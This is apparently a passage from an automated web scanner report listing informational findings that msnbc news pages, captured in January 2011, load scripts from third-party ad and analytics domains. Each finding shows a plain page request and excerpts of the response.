</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.503. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324874/ns/us_news-weird_news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324874/ns/us_news-weird_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 57532


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.504. http://www.msnbc.redacted/id/41324877/ns/world_news-europe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324877/ns/world_news-europe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324877/ns/world_news-europe HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 79050


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Video/110124/nn_04ami_moscow_110124.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.505. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324877/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41324877/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 79925


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Video/110124/nn_04ami_moscow_110124.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.506. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326456/ns/business-media_biz/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41326456/ns/business-media_biz/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 62455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.507. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326559/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41326559/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 52891


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://media.nbcdfw.com/images/391*298/PHI+ambulance+back.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.508. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326705/ns/world_news-south_and_central_asia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41326705/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60185


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/reuters/2011-01-29t112321z_01_btre70s0o8f00_rtroptp_3_afghanistan-kandahar.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.509. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41326705/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 59879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/reuters/2011-01-29t112321z_01_btre70s0o8f00_rtroptp_3_afghanistan-kandahar.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.510. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327238/ns/us_news-crime_and_courts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41327238/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 67109


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/ap/tampa teens shot--1273670434_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.511. http://www.msnbc.redacted/id/41327694/ns/us_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327694/ns/us_news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41327694/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 58924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/ap/gays in military-393706914_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.512. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327817/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.513. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327817/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Pragma: no-cache
RTSS: 1
Expires: Sun, 30 Jan 2011 19:01:00 GMT
Date: Sun, 30 Jan 2011 19:01:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 122609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.514. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327924/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41327924/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181055


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.515. http://www.msnbc.redacted/id/41328059/ns/us_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41328059/ns/us_news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41328059/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60365


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1c.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.516. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41328834/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41328834/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 55426


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
